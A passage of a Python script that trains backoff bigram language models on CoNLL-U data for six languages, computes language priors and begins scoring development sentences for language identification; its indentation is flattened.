list3 = list()
list4 = list()
list5 = list()
list6=list()
#at first storing observed bigrams using dictionary
bigramCounts1 = {}
bigramCounts2 = {}
bigramCounts3 = {}
bigramCounts4 = {}
bigramCounts5 = {}
bigramCounts6 = {}
#list for storing sentences which will later be used to update bigram
sentenceList1 = list()
sentenceList2 = list()
sentenceList3 = list()
sentenceList4 = list()
sentenceList5 = list()
sentenceList6 = list()
#word/token counts in order to calculate unigram probabilities and some other things
wordCount1 = 0
wordCount2 = 0
wordCount3 = 0
wordCount4 = 0
wordCount5 = 0
wordCount6 = 0
print("Reading in data from connlu files\n")
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train1):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list1.append(token["form"].lower())
wordCount1+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list1.append("<BOS>")
list1.append("<EOS>")
wordCount1+=2
#count of sentences in language one used for initial probability
#numSentences1+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList1.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train1.close()
tempSentence = []
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train2):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list2.append(token["form"].lower())
wordCount2+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list2.append("<BOS>")
list2.append("<EOS>")
wordCount2+=2
#count of sentences in language two used for initial probability
#numSentences2+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList2.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train2.close()
tempSentence = []
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train3):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list3.append(token["form"].lower())
wordCount3+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list3.append("<BOS>")
list3.append("<EOS>")
wordCount3+=2
#count of sentences in language one used for initial probability
#numSentences1+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList3.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train3.close()
tempSentence = []
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train4):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list4.append(token["form"].lower())
wordCount4+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list4.append("<BOS>")
list4.append("<EOS>")
wordCount4+=2
#count of sentences in language one used for initial probability
#numSentences1+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList4.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train4.close()
tempSentence = []
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train5):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list5.append(token["form"].lower())
wordCount5+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list5.append("<BOS>")
list5.append("<EOS>")
wordCount5+=2
#count of sentences in language one used for initial probability
#numSentences1+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList5.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train5.close()
tempSentence = []
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(train6):
for token in tokenlist:
##adding to temporary sentence which will be parsed into bigrams
#making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence.append(token["form"].lower())
#adding to list of tokens. this will later be used to get unigram counts
list6.append(token["form"].lower())
wordCount6+=1
#now adding eos and bos tags to the sentence
tempSentence.insert(0, "<BOS>")
tempSentence.append("<EOS>")
#now adding them to unigram token list
list6.append("<BOS>")
list6.append("<EOS>")
wordCount6+=2
#count of sentences in language one used for initial probability
#numSentences1+=1
#add the parsed sentence list of words to nested list of sentences
sentenceList6.append(tempSentence)
#resetting the temporary list of words per each sentence
tempSentence = []
train6.close()
tempSentence = []
#create dataframe containing all tokens and convert to series of counts per word type.
df1 = pd.DataFrame(list1)
series1= df1[0].value_counts()
df2 = pd.DataFrame(list2)
series2= df2[0].value_counts()
df3 = pd.DataFrame(list3)
series3= df3[0].value_counts()
df4 = pd.DataFrame(list4)
series4= df4[0].value_counts()
df5 = pd.DataFrame(list5)
series5= df5[0].value_counts()
df6 = pd.DataFrame(list6)
series6= df6[0].value_counts()
#setting aside some count of 1 for unknown. smallest possible whole word count
series1.at['<UNK>'] = 1
series2.at['<UNK>'] = 1
series3.at['<UNK>'] = 1
series4.at['<UNK>'] = 1
series5.at['<UNK>'] = 1
series6.at['<UNK>'] = 1
"""
#left in previous code for oov cutoff. using 1 instead of oovfreqency hyperparameter cutoff variable
#decided to not include the feature at this time due to time constraints for evaluating hyperparameters.
#for storing filtered vocab filtered by frequency
filteredList1 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series1.items():
if value > 0:
filteredList1.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList1.at['<UNK>'] = laplace
#####add unknown count to list with token <UNK> as the index
#####I am commenting this out because I am not assigning probability to unknown this way.
#####Instead I will be using laplace constant.
#####filteredList1.at['<UNK>'] = unknownCount
#for storing filtered vocab filtered by frequency
filteredList2 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series2.items():
if value > 0:
filteredList2.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList2.at['<UNK>'] = laplace
#####add unknown count to list with token <UNK> as the index
#####I am commenting this out because I am not assigning probability to unknown this way.
#####Instead I will be using laplace constant.
#####filteredList2.at['<UNK>'] = unknownCount.
#for storing filtered vocab filtered by frequency
filteredList3 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series3.items():
if value > 0:
filteredList3.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList3.at['<UNK>'] = laplace
#for storing filtered vocab filtered by frequency
filteredList4 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series4.items():
if value > 0:
filteredList4.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList4.at['<UNK>'] = laplace
#for storing filtered vocab filtered by frequency
filteredList5 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series5.items():
if value > 0:
filteredList5.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList5.at['<UNK>'] = laplace
#for storing filtered vocab filtered by frequency
filteredList6 = pd.Series()
#extract frequencies below oovFrequency cutoff constant and set them to some unknown token
unknownCount = 0
for index, value in series6.items():
if value > 0:
filteredList6.at[index] = value
else:
unknownCount+=value
####### maybe do this differently? unsure
#add unknown count to list with token <UNK> as the index
#filteredList6.at['<UNK>'] = laplace
"""
print("Start of unigram backoff\n")
#store unigram count copy for backoff
backedOffList1 = series1.copy()
backedOffList2 = series2.copy()
backedOffList3 = series3.copy()
backedOffList4 = series4.copy()
backedOffList5 = series5.copy()
backedOffList6 = series6.copy()
#for debugging
#print(backedOffList1)
#perform backoff by backoff constant on every unigram entry
backedOffList1-= uniBackoff
backedOffList2-=uniBackoff
backedOffList3-=uniBackoff
backedOffList4-=uniBackoff
backedOffList5-=uniBackoff
backedOffList6-=uniBackoff
#for debugging
#print(backedOffList1)
#calculate how much value was backed off in total per each language unigram
#this is 1 - sum (c(y) - d1 / count(tokens))
redistributedUnigram1 = (1- (backedOffList1.values.sum()/wordCount1))
redistributedUnigram2 = (1- (backedOffList2.values.sum()/wordCount2))
redistributedUnigram3 = (1- (backedOffList3.values.sum()/wordCount3))
redistributedUnigram4 = (1- (backedOffList4.values.sum()/wordCount4))
redistributedUnigram5 = (1- (backedOffList5.values.sum()/wordCount5))
redistributedUnigram6 = (1- (backedOffList6.values.sum()/wordCount6))
#for debugging
#print(redistributedUnigram1)
#for storing list of words (types) in the vocab which will be used for indexing the rows and columns of the dataframe
wordList1 = series1.keys().tolist()
wordList2 = series2.keys().tolist()
wordList3 = series3.keys().tolist()
wordList4 = series4.keys().tolist()
wordList5 = series5.keys().tolist()
wordList6 = series6.keys().tolist()
#get number of types
sizeOfVocab1=len(wordList1)
sizeOfVocab2=len(wordList2)
sizeOfVocab3=len(wordList3)
sizeOfVocab4=len(wordList4)
sizeOfVocab5=len(wordList5)
sizeOfVocab6=len(wordList6)
print("Creating sparse bigram counts\n")
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList1:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList1:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts1:
bigramCounts1[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts1[(wordPair[0], wordPair[1])] = 1.0
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList2:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList2:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts2:
bigramCounts2[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts2[(wordPair[0], wordPair[1])] = 1.0
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList3:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList3:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts3:
bigramCounts3[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts3[(wordPair[0], wordPair[1])] = 1.0
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList4:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList4:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts4:
bigramCounts4[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts4[(wordPair[0], wordPair[1])] = 1.0
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList5:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList5:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts5:
bigramCounts5[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts5[(wordPair[0], wordPair[1])] = 1.0
#filter out unknown words and make observed bigrams into dictionary
for tempSentence in sentenceList6:
#first filtering out the out of vocab words
for i in range( len(tempSentence)):
if not tempSentence[i] in wordList6:
tempSentence[i] = "<UNK>"
#parsing bigrams by pythonically creating them with islice and zip
tempBigram = zip(tempSentence, islice(tempSentence, 1, None))
#iterating over created list of bigrams and adding new ones to the dictionary while incrementing counts for existing bigrams
for wordPair in tempBigram :
if (wordPair[0], wordPair[1]) in bigramCounts6:
bigramCounts6[(wordPair[0], wordPair[1])] += 1
else:
bigramCounts6[(wordPair[0], wordPair[1])] = 1.0
print("Start of bigram backoff\n")
#convert these bigram count dictionaries to series so I can subtract from the series in pandas
backedOffBigram1 = pd.Series(bigramCounts1)
backedOffBigram2 = pd.Series(bigramCounts2)
backedOffBigram3 = pd.Series(bigramCounts3)
backedOffBigram4 = pd.Series(bigramCounts4)
backedOffBigram5 = pd.Series(bigramCounts5)
backedOffBigram6 = pd.Series(bigramCounts6)
#dictionary for holding redistributed value for every word. i.e. for holding a(x) = 1 - (∑(c(x,y) - δ2)/( c(x))) for all x words
#start out with value of one and then subtract accordingly
redistributedBigram1 = dict.fromkeys(wordList1, 1.0)
for key, value in backedOffBigram1.items():
#backoff by bigram backoff constant
backedOffBigram1[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram1[tempWordX]-= (backedOffBigram1[key]/series1[tempWordX])
redistributedBigram2 = dict.fromkeys(wordList2, 1.0)
for key, value in backedOffBigram2.items():
#backoff by bigram backoff constant
backedOffBigram2[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram2[tempWordX]-= (backedOffBigram2[key]/series2[tempWordX])
redistributedBigram3 = dict.fromkeys(wordList3, 1.0)
for key, value in backedOffBigram3.items():
#backoff by bigram backoff constant
backedOffBigram3[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram3[tempWordX]-= (backedOffBigram3[key]/series3[tempWordX])
redistributedBigram4 = dict.fromkeys(wordList4, 1.0)
for key, value in backedOffBigram4.items():
#backoff by bigram backoff constant
backedOffBigram4[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram4[tempWordX]-= (backedOffBigram4[key]/series4[tempWordX])
redistributedBigram5 = dict.fromkeys(wordList5, 1.0)
for key, value in backedOffBigram5.items():
#backoff by bigram backoff constant
backedOffBigram5[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram5[tempWordX]-= (backedOffBigram5[key]/series5[tempWordX])
redistributedBigram6 = dict.fromkeys(wordList6, 1.0)
for key, value in backedOffBigram6.items():
#backoff by bigram backoff constant
backedOffBigram6[key] -= biBackoff
#get key of x value in (x,y) bigram
tempWordX = key[0]
#subtract from list of redistributed bigram values per word x as per the formula 1 - (c(x,y) - d2 / c(x))
#by looping I am able to subtract the summation of these existing (c(x,y) - d2 / c(x)) values
redistributedBigram6[tempWordX]-= (backedOffBigram6[key]/series6[tempWordX])
#for debugging
#print(backedOffBigram6)
#print(redistributedBigram6)
####get entire vocab. maybe don't need this code
wordList = wordList1+wordList2+wordList3+wordList4+wordList5+wordList6
#initial probability is using simply count of sentences in one language over total count of sentences
probLang1 = len(sentenceList1) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
probLang2 = len(sentenceList2) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
probLang3 = len(sentenceList3) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
probLang4 = len(sentenceList4) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
probLang5 = len(sentenceList5) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
probLang6 = len(sentenceList6) / (len(sentenceList1) + len(sentenceList2) + len(sentenceList3) + len(sentenceList4) + len(sentenceList5) + len(sentenceList6))
#initial probabilities
print("\nInitial probability of the first language passed to this program:")
print(probLang1)
print("Initial probability of the second language passed to this program:")
print(probLang2)
print("Initial probability of the third language passed to this program:")
print(probLang3)
print("Initial probability of the fourth language passed to this program:")
print(probLang4)
print("Initial probability of the fifth language passed to this program:")
print(probLang5)
print("Initial probability of the sixth language passed to this program:")
print(probLang6)
print("\nEvaluating development or training set on data\n")
#evaluate on dev set (or look at results on test set if you input test set file paths)
en_dev1 = open(pathToTuneLang1, "r", encoding="utf-8")
en_dev2 = open(pathToTuneLang2, "r", encoding="utf-8")
en_dev3 = open(pathToTuneLang3, "r", encoding="utf-8")
en_dev4 = open(pathToTuneLang4, "r", encoding="utf-8")
en_dev5 = open(pathToTuneLang5, "r", encoding="utf-8")
en_dev6 = open(pathToTuneLang6, "r", encoding="utf-8")
tempSentence1 = list()
tempSentence2 = list()
tempSentence3 = list()
tempSentence4 = list()
tempSentence5 = list()
tempSentence6 = list()
#lists for storing predicted languages vs actual langs
predictedLang = []
actualLang = []
#for tracking and printing progress through dev set
countDevLang1=0
countDevLang2=0
countDevLang3=0
countDevLang4=0
countDevLang5=0
countDevLang6=0
#connlu parse and update bigram and unigram counts
for tokenlist in parse_incr(en_dev1):
##for debugging
#print(tokenlist)
#for storing values that will later have redistributed unigram probability
tempUnigramBackoffList1 = {}
tempUnigramBackoffList2 = {}
tempUnigramBackoffList3 = {}
tempUnigramBackoffList4 = {}
tempUnigramBackoffList5 = {}
tempUnigramBackoffList6 = {}
for token in tokenlist:
#If sentence is in entire vocab from all languages, add the word to the sentence. Otherwise add the unknown token to the sentence.
#Regardless, if the bigram doesn't exist in a specific language one will have laplace + 0 bigram count /unigram count+ laplace + V.
#If the unigram doesn't exist, one will have laplace + 0 bigram count / laplace + 0 + V. If the bigram exists one instead has bigram count+laplace
# divided by unigram count + laplace + V
#if not (token["form"].lower()) in wordList :
# tempSentence1.append('<UNK>')
# tempSentence2.append('<UNK>')
# tempSentence3.append('<UNK>')
# tempSentence4.append('<UNK>')
# tempSentence5.append('<UNK>')
# tempSentence6.append('<UNK>')
#else:
# ##adding to temporary sentence which will be parsed into bigrams
# #making it lower case as a means of preprocessing. words of different case but same spelling are the same type for my purposes
tempSentence1.append(token["form"].lower())
tempSentence2.append(token["form"].lower())
tempSentence3.append(token["form"].lower())
tempSentence4.append(token["form"].lower())
tempSentence5.append(token["form"].lower())
tempSentence6.append(token["form"].lower())
#now adding eos and bos tags to the sentence
tempSentence1.insert(0, "<BOS>")
tempSentence1.append("<EOS>")
tempSentence2.insert(0, "<BOS>")
tempSentence2.append("<EOS>")
tempSentence3.insert(0, "<BOS>")
tempSentence3.append("<EOS>")
tempSentence4.insert(0, "<BOS>")
tempSentence4.append("<EOS>")
tempSentence5.insert(0, "<BOS>")
tempSentence5.append("<EOS>")
tempSentence6.insert(0, "<BOS>")
tempSentence6.append("<EOS>")
#this is math.log(1) since I am adding log probabilities to avoid multiplication
probSentenceGivenL1 = 0
probSentenceGivenL2 = 0
probSentenceGivenL3 = 0
probSentenceGivenL4 = 0
probSentenceGivenL5 = 0
probSentenceGivenL6 = 0
#for zipping to bigram tuples
tempBigram1 = zip(tempSentence1, islice(tempSentence1, 1, None))
tempBigram2 = zip(tempSentence2, islice(tempSentence2, 1, None))
tempBigram3 = zip(tempSentence3, islice(tempSentence3, 1, None))
tempBigram4 = zip(tempSentence4, islice(tempSentence4, 1, None))
tempBigram5 = zip(tempSentence5, islice(tempSentence5, 1, None))
tempBigram6 = zip(tempSentence6, islice(tempSentence6, 1, None))
#for debugging
#print(tempBigram1)
for wordPair in tempBigram1 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram1:
normalizingConstant = (series1[wordPair[0]])
tempProbability = (backedOffBigram1[wordPair])/(normalizingConstant)
#print("lang one bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
probSentenceGivenL1+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList1:
if wordPair[0] in redistributedBigram1:
tempProbability = redistributedBigram1[wordPair[0]] *( backedOffList1[wordPair[1]] / wordCount1)
else:
tempProbability = redistributedBigram1['<UNK>'] *( backedOffList1[wordPair[1]] / wordCount1)
probSentenceGivenL1+=math.log(tempProbability)
#print("lang one backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang one bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList1:
tempUnigramBackoffList1[wordPair] += 1
else:
tempUnigramBackoffList1[wordPair] = 1
for wordPair in tempBigram2 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram2:
normalizingConstant = (series2[wordPair[0]])
tempProbability = (backedOffBigram2[wordPair])/(normalizingConstant)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList2:
if wordPair[0] in redistributedBigram2:
tempProbability = redistributedBigram2[wordPair[0]] *( backedOffList2[wordPair[1]] / wordCount2)
else:
tempProbability = redistributedBigram2['<UNK>'] *( backedOffList2[wordPair[1]] / wordCount2)
probSentenceGivenL2+=math.log(tempProbability)
#print("lang two backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang two bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList2:
tempUnigramBackoffList2[wordPair] += 1
else:
tempUnigramBackoffList2[wordPair] = 1
for wordPair in tempBigram3 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram3:
normalizingConstant = (series3[wordPair[0]])
tempProbability = (backedOffBigram3[wordPair])/(normalizingConstant)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList3:
if wordPair[0] in redistributedBigram3:
tempProbability = redistributedBigram3[wordPair[0]] *( backedOffList3[wordPair[1]] / wordCount3)
else:
tempProbability = redistributedBigram3['<UNK>'] *( backedOffList3[wordPair[1]] / wordCount3)
probSentenceGivenL3+=math.log(tempProbability)
#print("lang three backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang three bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList3:
tempUnigramBackoffList3[wordPair] += 1
else:
tempUnigramBackoffList3[wordPair] = 1
for wordPair in tempBigram4 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram4:
#print("lang four bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
normalizingConstant = (series4[wordPair[0]])
tempProbability = (backedOffBigram4[wordPair])/(normalizingConstant)
probSentenceGivenL4+=math.log(tempProbability)
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList4:
if wordPair[0] in redistributedBigram4:
tempProbability = redistributedBigram4[wordPair[0]] *( backedOffList4[wordPair[1]] / wordCount4)
else:
tempProbability = redistributedBigram4['<UNK>'] *( backedOffList4[wordPair[1]] / wordCount4)
probSentenceGivenL4+=math.log(tempProbability)
#print("lang four backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang four bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList4:
tempUnigramBackoffList4[wordPair] += 1
else:
tempUnigramBackoffList4[wordPair] = 1
for wordPair in tempBigram5 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram5:
normalizingConstant = (series5[wordPair[0]])
tempProbability = (backedOffBigram5[wordPair])/(normalizingConstant)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList5:
if wordPair[0] in redistributedBigram5:
tempProbability = redistributedBigram5[wordPair[0]] *( backedOffList5[wordPair[1]] / wordCount5)
else:
tempProbability = redistributedBigram5['<UNK>'] *( backedOffList5[wordPair[1]] / wordCount5)
probSentenceGivenL5+=math.log(tempProbability)
#print("lang five backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang five bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList5:
tempUnigramBackoffList5[wordPair] += 1
else:
tempUnigramBackoffList5[wordPair] = 1
for wordPair in tempBigram6 :
#if c(x,y)>0 just count probability as c(x,y)-d2 / c(x)
if wordPair in backedOffBigram6:
normalizingConstant = (series6[wordPair[0]])
tempProbability = (backedOffBigram6[wordPair])/(normalizingConstant)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six bigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#otherwise check if c(x)>0 and if it is, count a(x) * (c(x)/ summation of c(v) across all V) as the probability
if wordPair[1] in backedOffList6:
if wordPair[0] in redistributedBigram6:
tempProbability = redistributedBigram6[wordPair[0]] *( backedOffList6[wordPair[1]] / wordCount6)
else:
tempProbability = redistributedBigram6['<UNK>'] *( backedOffList6[wordPair[1]] / wordCount6)
probSentenceGivenL6+=math.log(tempProbability)
#print("lang six backed off unigram exists with probability of %f. The bigram is: " %tempProbability)
#print(wordPair)
#print("\n")
else:
#print("lang six bigram does not exist and backed off twice. The bigram is: ")
#print(wordPair)
#print("\n")
#otherwise add the word pair as a key to a list of double backed off values
if wordPair in tempUnigramBackoffList6:
tempUnigramBackoffList6[wordPair] += 1
else:
tempUnigramBackoffList6[wordPair] = 1
#redistribute the probabilities that had to be backed off twice.
#print("Now redistributing unigram backoff as necessary.\n")
#First need to count number of oov types
numOOVTypes1 = len(tempUnigramBackoffList1)
numOOVTypes2 = len(tempUnigramBackoffList2)
numOOVTypes3 = len(tempUnigramBackoffList3)
numOOVTypes4 = len(tempUnigramBackoffList4)
numOOVTypes5 = len(tempUnigramBackoffList5)
numOOVTypes6 = len(tempUnigramBackoffList6)
#print(numOOVTypes1)
#print(numOOVTypes2)
#print(numOOVTypes3)
#print(numOOVTypes4)
#print(numOOVTypes5)
#print(numOOVTypes6)
#then need to get b/v values where V is the size of the total vocab of known and previously unknown newly encountered words
#b is the probability mass set aside for redistribution
distValueUnigram1 = redistributedUnigram1/(numOOVTypes1+sizeOfVocab1)
distValueUnigram2 = redistributedUnigram2/(numOOVTypes2+sizeOfVocab2)
distValueUnigram3 = redistributedUnigram3/(numOOVTypes3+sizeOfVocab3)
distValueUnigram4 = redistributedUnigram4/(numOOVTypes4+sizeOfVocab4)
distValueUnigram5 = redistributedUnigram5/(numOOVTypes5+sizeOfVocab5)
distValueUnigram6 = redistributedUnigram6/(numOOVTypes6+sizeOfVocab6)
#Now multiply this b/v value by its a(x) and add its log linear probability up as necessary per each occurence/count of double backed off bigram
for key, value in tempUnigramBackoffList1.items():
if key[0] in redistributedBigram1:
tempProbabilitySum = value * math.log(redistributedBigram1[key[0]]*distValueUnigram1)
else:
tempProbabilitySum = value * math.log(redistributedBigram1['<UNK>']*distValueUnigram1)
probSentenceGivenL1+=(tempProbabilitySum)
